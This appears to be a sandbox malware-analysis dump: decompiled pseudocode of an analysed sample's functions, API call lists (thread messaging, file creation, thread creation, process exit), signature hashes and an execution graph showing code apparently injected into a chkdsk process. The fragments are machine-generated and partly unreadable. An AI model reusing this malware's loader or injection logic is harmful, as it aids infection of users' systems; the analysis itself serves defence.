                                                      control_flow_graph 355 407305-40730c 357 40729b-4072ca call 41ad20 call 409b40 call 413e50 355->357 358 40730e-407368 call 41a140 call 407280 call 4199d0 355->358 371 4072cc-4072de PostThreadMessageW 357->371 372 4072fe-407302 357->372 373 407370-4073a2 call 40d3d0 call 418780 358->373 376 4072e0-4072fa call 4092a0 371->376 377 4072fd 371->377 383 4073a4-4073ac 373->383 384 4073d7-4073df 373->384 376->377 377->372 385 4073c6-4073d0 383->385 386 4073ae-4073b5 383->386 385->373 388 4073d2-4073d5 385->388 386->385 387 4073b7-4073be 386->387 387->385 389 4073c0-4073c4 387->389 390 4073fd-40740f call 418710 388->390 389->385 391 4073e0-4073fa call 41a0c0 389->391 390->384 396 407411-40747c call 417f90 390->396 391->390 396->384 399 407482-4074de call 417fd0 396->399 399->384 402 4074e4-407531 call 419670 call 419690 call 41a3b0 call 41a0c0 call 413a50 399->402
                                                      C-Code - Quality: 75%
                                                      			E00407305(void* __eflags, intOrPtr _a4, int _a8, long _a12, int _a16, intOrPtr _a85) {
                                                      				int _v8;
                                                      				char _v64;
                                                      				int _v132;
                                                      				int _v136;
                                                      				char _v656;
                                                      				int _v668;
                                                      				char _v684;
                                                      				char _v688;
                                                      				int __ebx;
                                                      				intOrPtr __edi;
                                                      				int __esi;
                                                      				void* _t63;
                                                      				int _t64;
                                                      				long _t71;
                                                      				int _t75;
                                                      				void* _t77;
                                                      				int _t84;
                                                      
                                                      				_t83 = __eflags;
                                                      				[far dword [ebp-0xd]();
                                                      				asm("adc al, 0x35");
                                                      				if(__eflags >= 0) {
                                                      					E0041AD20(0x3f, 3);
                                                      					_t63 = E00409B40(_t83, _a8 + 0x1c,  &_v64); // executed
                                                      					_t64 = E00413E50(_a8 + 0x1c, _t63, 0, 0, 0xc4e7b6d6);
                                                      					_t75 = _t64;
                                                      					_t84 = _t75;
                                                      					if(_t84 != 0) {
                                                      						_t71 = _a12;
                                                      						if(_t84 < 0) {
                                                      							_t64 = PostThreadMessageW(_t71, 0x111, 0, 0); // executed
                                                      						}
                                                      						_t85 = _t64;
                                                      						if(_t64 == 0) {
                                                      							_t64 =  *_t75(_t71, 0x8003, _t77 + (E004092A0(_t85, 1, 8) & 0x000000ff) - 0x40, _t64);
                                                      						}
                                                      					}
                                                      					return _t64;
                                                      				} else {
                                                      					cs = _a85;
                                                      					_push(__ebp);
                                                      					__ebp = __esp;
                                                      					__esp = __esp - 0x2ac;
                                                      					_push(__ebx);
                                                      					_push(__esi);
                                                      					_push(__edi);
                                                      					__eax = 0;
                                                      					_v8 = 0;
                                                      					_v688 = 0;
                                                      					 &_v684 = E0041A140( &_v684, 0, 0x2a4);
                                                      					__esi = _a16;
                                                      					__ecx =  *((intOrPtr*)(__esi + 0x300));
                                                      					__edi = _a4;
                                                      					__eax = E00407280(__eflags, _a4,  *((intOrPtr*)(__esi + 0x300))); // executed
                                                      					__eax = E004199D0(__ecx);
                                                      					_t15 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                                                      					__ebx = __eax + _t15;
                                                      					_a16 = 0;
                                                      					while(1) {
                                                      						__eax = E0040D3D0(__edi, 0xfe363c80); // executed
                                                      						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                      						__eax =  &_v688;
                                                      						__eax = E00418780(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                                                      						 *(__esi + 0x2dc) = __eax;
                                                      						__eflags = __eax;
                                                      						if(__eax < 0) {
                                                      							break;
                                                      						}
                                                      						__eflags = _v656;
                                                      						if(_v656 == 0) {
                                                      							L16:
                                                      							__eax = _a16;
                                                      							__eax = _a16 + 1;
                                                      							_a16 = __eax;
                                                      							__eflags = __eax - 2;
                                                      							if(__eax < 2) {
                                                      								continue;
                                                      							} else {
                                                      								__ebx = _v8;
                                                      								goto L20;
                                                      							}
                                                      						} else {
                                                      							__eflags = _v668;
                                                      							if(_v668 == 0) {
                                                      								goto L16;
                                                      							} else {
                                                      								__eflags = _v136;
                                                      								if(_v136 == 0) {
                                                      									goto L16;
                                                      								} else {
                                                      									__eflags = _v132;
                                                      									if(_v132 != 0) {
                                                      										__eax = _a12;
                                                      										__edx =  &_v688;
                                                      										__ebx = 1;
                                                      										__eax = E0041A0C0(_a12,  &_v688, 0x2a8);
                                                      										L20:
                                                      										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                      										__eax = E00418710(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                                                      										__eflags = __ebx;
                                                      										if(__ebx == 0) {
                                                      											break;
                                                      										} else {
                                                      											__edx = _v668;
                                                      											__eax = _a12;
                                                      											__ecx = _v136;
                                                      											 *(_a12 + 0x14) = _v668;
                                                      											__edx =  *(__esi + 0x2d0);
                                                      											_t35 = __esi + 0x2e8; // 0x2e8
                                                      											__eax = _t35;
                                                      											 *_t35 = _v136;
                                                      											__eax = _a12;
                                                      											_t37 = __esi + 0x314; // 0x314
                                                      											__ebx = _t37;
                                                      											__ecx = 0;
                                                      											__eax = _a12 + 0x220;
                                                      											 *__ebx = 0x18;
                                                      											 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                      											 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                      											 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                      											 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                      											 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                      											__eax = E00417F90(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
                                                      											__ecx = 0;
                                                      											 *(__esi + 0x2dc) = __eax;
                                                      											__eflags = __eax;
                                                      											if(__eax < 0) {
                                                      												break;
                                                      											} else {
                                                      												__edx = _v132;
                                                      												_t45 = __esi + 0x2e0; // 0x2e0
                                                      												__eax = _t45;
                                                      												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                      												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                      												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                      												 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                      												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                      												_a12 = _a12 + 0x224;
                                                      												 *(__esi + 0x2e4) = _v132;
                                                      												 *__ebx = 0x18;
                                                      												 *(__esi + 0x2d0) = 0x1a;
                                                      												__eax = E00417FD0(__edi, _a12 + 0x224, 0x1a, __ebx, _t45);
                                                      												 *(__esi + 0x2dc) = __eax;
                                                      												__eflags = __eax;
                                                      												if(__eax < 0) {
                                                      													break;
                                                      												} else {
                                                      													__edx = _a8;
                                                      													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
                                                      													__eflags =  *(__edx + 0x10) + 0x200;
                                                      													__eax = E00419670(__ecx);
                                                      													__ebx = __eax;
                                                      													__eax =  *(__ebx + 0x28);
                                                      													__eax = E0041A3B0( *(__ebx + 0x28));
                                                      													__edx =  *(__ebx + 0x28);
                                                      													_t60 = __eax + 2; // 0x2
                                                      													__ecx = __eax + _t60;
                                                      													__eax =  &_v656;
                                                      													__eax = E00413A50(__edi,  &_v656, 2, 0); // executed
                                                      													_pop(__edi);
                                                      													_pop(__esi);
                                                      													_pop(__ebx);
                                                      													__esp = __ebp;
                                                      													_pop(__ebp);
                                                      													return __eax;
                                                      												}
                                                      											}
                                                      										}
                                                      									} else {
                                                      										goto L16;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L24;
                                                      					}
                                                      					_pop(__edi);
                                                      					_pop(__esi);
                                                      					__eax = 0;
                                                      					__eflags = 0;
                                                      					_pop(__ebx);
                                                      					__esp = __ebp;
                                                      					_pop(__ebp);
                                                      					return 0;
                                                      				}
                                                      				L24:
                                                      			}




















                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: b72b3ff8d7146015b4160c7a2f9311d3bb88061f7b67835bd092b3660ca99e5e
                                                      • Instruction ID: 876f1f7e9c94b02fb5d4ad078d2ed7a453e6bd2aa79c22fd683b851587cebbaa
                                                      • Opcode Fuzzy Hash: b72b3ff8d7146015b4160c7a2f9311d3bb88061f7b67835bd092b3660ca99e5e
                                                      • Instruction Fuzzy Hash: D061A570900209AFD724DF65DC85FEB77B8AB44304F10446EF909A7281DB78BD41CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 413 407280-4072ca call 41a140 call 41ad20 call 409b40 call 413e50 423 4072cc-4072da PostThreadMessageW 413->423 424 4072fe-407302 413->424 425 4072dc-4072de 423->425 426 4072e0-4072fa call 4092a0 425->426 427 4072fd 425->427 426->427 427->424
                                                      C-Code - Quality: 82%
                                                      			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
                                                      				char _v67;
                                                      				char _v68;
                                                      				void* _t12;
                                                      				int _t13;
                                                      				long _t20;
                                                      				int _t24;
                                                      				void* _t25;
                                                      				void* _t29;
                                                      				int _t30;
                                                      
                                                      				_t29 = __eflags;
                                                      				_v68 = 0;
                                                      				E0041A140( &_v67, 0, 0x3f);
                                                      				E0041AD20( &_v68, 3);
                                                      				_t12 = E00409B40(_t29, _a4 + 0x1c,  &_v68); // executed
                                                      				_t13 = E00413E50(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                      				_t24 = _t13;
                                                      				_t30 = _t24;
                                                      				if(_t30 != 0) {
                                                      					_t20 = _a8;
                                                      					if(_t30 < 0) {
                                                      						_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                      					}
                                                      					_t31 = _t13;
                                                      					if(_t13 == 0) {
                                                      						_t13 =  *_t24(_t20, 0x8003, _t25 + (E004092A0(_t31, 1, 8) & 0x000000ff) - 0x40, _t13);
                                                      					}
                                                      					return _t13;
                                                      				}
                                                      				return _t13;
                                                      			}












                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                      • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                                      • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                      • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 454 407303 456 4072d0-4072da PostThreadMessageW 454->456 457 4072dc-4072de 454->457 456->457 458 4072e0-4072fa call 4092a0 457->458 459 4072fd-407302 457->459 458->459
                                                      C-Code - Quality: 58%
                                                      			E00407303(intOrPtr* __esi, void* __eflags) {
                                                      				int _t3;
                                                      				long _t7;
                                                      				intOrPtr* _t9;
                                                      				void* _t11;
                                                      
                                                      				_t9 = __esi;
                                                      				if(__eflags < 0) {
                                                      					_t3 = PostThreadMessageW(_t7, 0x111, 0, 0); // executed
                                                      				}
                                                      				_t17 = _t3;
                                                      				if(_t3 == 0) {
                                                      					_t3 =  *_t9(_t7, 0x8003, _t11 + (E004092A0(_t17, 1, 8) & 0x000000ff) - 0x40, _t3);
                                                      				}
                                                      				return _t3;
                                                      			}








                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 842b354418d615c723ca88be0b85315682146f27673c32ee823317f377e052bb
                                                      • Instruction ID: 75953388b3a038e180496df6f2c277d499297c5e6f2c9266baa6d640101f9137
                                                      • Opcode Fuzzy Hash: 842b354418d615c723ca88be0b85315682146f27673c32ee823317f377e052bb
                                                      • Instruction Fuzzy Hash: 1EE01221B9421935E92055556C43FBA36589751B05F6004BFFB04F81C1D9D9240556F6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E004188F0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                      				char _t10;
                                                      				void* _t15;
                                                      
                                                      				_t3 = _a4 + 0xc74; // 0xc74
                                                      				E004191E0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                      				return _t10;
                                                      			}





                                                      0x004188ff
                                                      0x00418907
                                                      0x0041891d
                                                      0x00418921

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00418A50(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                      				int _t10;
                                                      				void* _t15;
                                                      
                                                      				E004191E0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                      				return _t10;
                                                      			}





                                                      0x00418a6a
                                                      0x00418a80
                                                      0x00418a84

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00418922(intOrPtr _a4, int _a8) {
                                                      				signed char _t10;
                                                      				signed int _t11;
                                                      				void* _t16;
                                                      				signed char _t17;
                                                      				int _t21;
                                                      				void* _t22;
                                                      
                                                      				asm("out 0x90, eax");
                                                      				_t11 = _t10 ^  *(_t16 - 0x262fab82);
                                                      				_t21 = _t11 * _t17 >> 0x20;
                                                      				if(_t11 * _t17 == 0) {
                                                      					L3:
                                                      					_push(es);
                                                      					ExitProcess(_t21);
                                                      				}
                                                      				_t15 = _a4;
                                                      				_t8 = _t15 + 0xc7c; // 0x8bec97d1
                                                      				E004191E0(_t22, _a4, _t8,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36);
                                                      				_t21 = _a8;
                                                      				goto L3;
                                                      			}










                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: b141c7c086a07b6aa7614122dd88b87bfe30fcde0a4593ba4501d525e2845ddd
                                                      • Instruction ID: 8075bfb8c7973218f52e21029c2786017616711d21bda410d6718783f9f14bae
                                                      • Opcode Fuzzy Hash: b141c7c086a07b6aa7614122dd88b87bfe30fcde0a4593ba4501d525e2845ddd
                                                      • Instruction Fuzzy Hash: 08E026712085412BE7018B784C8EED33F988F46340F18489AF8D84F213C4289A42C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E00418930(intOrPtr _a4, int _a8) {
                                                      				int _t9;
                                                      				void* _t10;
                                                      
                                                      				_t5 = _a4;
                                                      				_t3 = _t5 + 0xc7c; // 0x8bec97d1
                                                      				E004191E0(_t10, _a4, _t3,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                      				_t9 = _a8;
                                                      				_push(es);
                                                      				ExitProcess(_t9);
                                                      			}






                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00415681(void* __eax, void* __ebx, signed int* __edx) {
                                                      
                                                      				 *__edx =  *__edx ^ 0x5b53d644;
                                                      				return __edx;
                                                      			}



                                                      0x00415684
                                                      0x00415696

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_GV8EJooYMIgEnEk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d14350f5905cbfdda0143067de4325199c12f68d658b15841afbe04abbbe725c
                                                      • Instruction ID: efce8b38cc42e0a72207b25693d950f6b240b92dce7d07120b00ae9d3136fb58
                                                      • Opcode Fuzzy Hash: d14350f5905cbfdda0143067de4325199c12f68d658b15841afbe04abbbe725c
                                                      • Instruction Fuzzy Hash: 80B09277F491164E65191C2DBC031B9F774EAC30B9B0463A3CC0EBB552C643C42B499C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:4.8%
                                                      Dynamic/Decrypted Code Coverage:2%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:694
                                                      Total number of Limit Nodes:84
4aa8710 2 API calls 31527->31529 31528 4a9ae44 31528->31524 31649 4aa80d0 LdrLoadDll 31528->31649 31530 4a9ae8b 31529->31530 31532 4aa8710 2 API calls 31530->31532 31533 4a9ae95 31532->31533 31534 4a97280 3 API calls 31533->31534 31533->31535 31534->31535 31535->31415 31537 4a9d3e3 31536->31537 31722 4aa8110 31537->31722 31540->31415 31542 4a9d21d 31541->31542 31543 4a9d25e 31542->31543 31548 4aa8240 31542->31548 31545 4a9d265 31543->31545 31553 4aa8290 31543->31553 31545->31480 31549 4aa825c 31548->31549 31550 4aa91e0 LdrLoadDll 31548->31550 31558 4dc99a0 LdrInitializeThunk 31549->31558 31550->31549 31551 4aa827f 31551->31543 31554 4aa82ac 31553->31554 31555 4aa91e0 LdrLoadDll 31553->31555 31559 4dc9780 LdrInitializeThunk 31554->31559 31555->31554 31556 4a9d28e 31556->31480 31558->31551 31559->31556 31561 4aaa270 2 API calls 31560->31561 31562 4aa7b17 31561->31562 31581 4a98160 31562->31581 31564 4aa7b32 31565 4aa7b59 31564->31565 31566 4aa7b70 31564->31566 31567 4aaa0a0 2 API calls 31565->31567 31569 4aaa020 2 API calls 31566->31569 31568 4aa7b66 31567->31568 31568->31485 31570 4aa7baa 31569->31570 31571 4aaa020 2 API calls 31570->31571 31572 4aa7bc3 31571->31572 31578 4aa7e64 31572->31578 31587 4aaa060 LdrLoadDll 31572->31587 31574 4aa7e49 31575 4aa7e50 31574->31575 31574->31578 31576 4aaa0a0 2 API calls 31575->31576 31577 4aa7e5a 31576->31577 31577->31485 31579 4aaa0a0 2 API calls 31578->31579 31580 4aa7eb9 31579->31580 31580->31485 31582 4a98185 31581->31582 31583 4a99b40 LdrLoadDll 31582->31583 31584 4a981b8 31583->31584 31586 4a981dd 31584->31586 31588 4a9b340 31584->31588 31586->31564 31587->31574 31589 4a9b36c 31588->31589 31590 4aa8460 LdrLoadDll 31589->31590 31591 4a9b385 31590->31591 31592 4a9b38c 31591->31592 31599 4aa84a0 31591->31599 31592->31586 31596 4a9b3c7 31597 4aa8710 2 API calls 31596->31597 31598 4a9b3ea 31597->31598 31598->31586 31600 4aa91e0 LdrLoadDll 31599->31600 31601 4aa84bc 31600->31601 31607 4dc9710 LdrInitializeThunk 31601->31607 
31602 4a9b3af 31602->31592 31604 4aa8a90 31602->31604 31605 4aa8aaf 31604->31605 31606 4aa91e0 LdrLoadDll 31604->31606 31605->31596 31606->31605 31607->31602 31609 4a9ccc7 31608->31609 31651 4a9bdb0 31609->31651 31611 4a9ccd7 31617 4a9ccf0 31611->31617 31664 4a93d70 31611->31664 31613 4aaa270 2 API calls 31615 4a9ccfe 31613->31615 31614 4a9ccea 31688 4aa7430 31614->31688 31615->31488 31617->31613 31620 4a9863b 31618->31620 31619 4a9875b 31619->31491 31620->31619 31621 4a9d080 3 API calls 31620->31621 31622 4a9873c 31621->31622 31623 4a9876a 31622->31623 31624 4a98751 31622->31624 31625 4aa8710 2 API calls 31622->31625 31623->31491 31721 4a95ea0 LdrLoadDll 31624->31721 31625->31624 31628 4aa91e0 LdrLoadDll 31627->31628 31629 4a9acb0 31627->31629 31628->31629 31629->31498 31629->31499 31629->31535 31631 4aa75e2 31630->31631 31632 4a9d3d0 2 API calls 31630->31632 31631->31516 31632->31631 31634 4a97298 31633->31634 31635 4a99b40 LdrLoadDll 31634->31635 31636 4a972b3 31635->31636 31637 4aa3e50 LdrLoadDll 31636->31637 31638 4a972c3 31637->31638 31639 4a972cc PostThreadMessageW 31638->31639 31640 4a972fd 31638->31640 31641 4a972dc 31639->31641 31640->31415 31641->31640 31642 4a972ea PostThreadMessageW 31641->31642 31642->31640 31643->31502 31644->31509 31645->31515 31646->31519 31647->31523 31648->31528 31649->31524 31650->31527 31652 4a9bde3 31651->31652 31693 4a9a150 31652->31693 31654 4a9bdf5 31697 4a9a2c0 31654->31697 31656 4a9be13 31657 4a9a2c0 LdrLoadDll 31656->31657 31658 4a9be29 31657->31658 31659 4a9d200 3 API calls 31658->31659 31660 4a9be4d 31659->31660 31661 4a9be54 31660->31661 31700 4aaa2b0 LdrLoadDll RtlAllocateHeap 31660->31700 31661->31611 31663 4a9be64 31663->31611 31665 4a93d96 31664->31665 31666 4a9b340 3 API calls 31665->31666 31668 4a93e61 31666->31668 31667 4a93e68 31667->31614 31668->31667 31701 4aaa2f0 31668->31701 31670 4a93ec9 31671 4a99e90 LdrLoadDll 31670->31671 31672 4a93fd3 31671->31672 31673 4a99e90 LdrLoadDll 31672->31673 31674 4a93ff7 
31673->31674 31705 4a9b400 31674->31705 31678 4a94083 31679 4aaa020 2 API calls 31678->31679 31680 4a94110 31679->31680 31681 4aaa020 2 API calls 31680->31681 31683 4a9412a 31681->31683 31682 4a942a6 31682->31614 31683->31682 31684 4a99e90 LdrLoadDll 31683->31684 31685 4a9416a 31684->31685 31686 4a99d60 LdrLoadDll 31685->31686 31687 4a9420a 31686->31687 31687->31614 31689 4aa3e50 LdrLoadDll 31688->31689 31690 4aa7451 31689->31690 31691 4aa7477 31690->31691 31692 4aa7464 CreateThread 31690->31692 31691->31617 31692->31617 31694 4a9a177 31693->31694 31695 4a99e90 LdrLoadDll 31694->31695 31696 4a9a1b3 31695->31696 31696->31654 31698 4a99e90 LdrLoadDll 31697->31698 31699 4a9a2d9 31697->31699 31698->31699 31699->31656 31700->31663 31702 4aaa2fd 31701->31702 31703 4aa3e50 LdrLoadDll 31702->31703 31704 4aaa310 31703->31704 31704->31670 31706 4a9b425 31705->31706 31714 4aa8310 31706->31714 31709 4aa83a0 31710 4aa91e0 LdrLoadDll 31709->31710 31711 4aa83bc 31710->31711 31720 4dc9650 LdrInitializeThunk 31711->31720 31712 4aa83db 31712->31678 31715 4aa91e0 LdrLoadDll 31714->31715 31716 4aa832c 31715->31716 31719 4dc96d0 LdrInitializeThunk 31716->31719 31717 4a9405c 31717->31678 31717->31709 31719->31717 31720->31712 31721->31619 31723 4aa91e0 LdrLoadDll 31722->31723 31724 4aa812c 31723->31724 31727 4dc9840 LdrInitializeThunk 31724->31727 31725 4a9d40e 31725->31415 31727->31725 31728 4aa7300 31729 4aa733b 31728->31729 31730 4aaa020 2 API calls 31728->31730 31731 4aa741c 31729->31731 31732 4a99b40 LdrLoadDll 31729->31732 31730->31729 31733 4aa7371 31732->31733 31734 4aa3e50 LdrLoadDll 31733->31734 31736 4aa738d 31734->31736 31735 4aa73a0 Sleep 31735->31736 31736->31731 31736->31735 31739 4aa6f30 LdrLoadDll 31736->31739 31740 4aa7130 LdrLoadDll 31736->31740 31739->31736 31740->31736 31743 4dc9540 LdrInitializeThunk

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 265 4aa85e0-4aa8631 call 4aa91e0 NtCreateFile
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,04AA3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04AA3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 04AA862D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: ef1b63cf8080f4e1ca3c66050196d8e18e57d61ed89cb18ec85578ad5c39e49c
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: F1F0BDB2205208ABCB48CF88DC84EEB77ADAF8C754F158248FA0D97240C630F811CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 262 4aa85da-4aa85f6 263 4aa85fc-4aa8631 NtCreateFile 262->263 264 4aa85f7 call 4aa91e0 262->264 264->263
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,04AA3BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,04AA3BB7,007A002E,00000000,00000060,00000000,00000000), ref: 04AA862D
                                                      Strings
                                                      Memory Dump Source
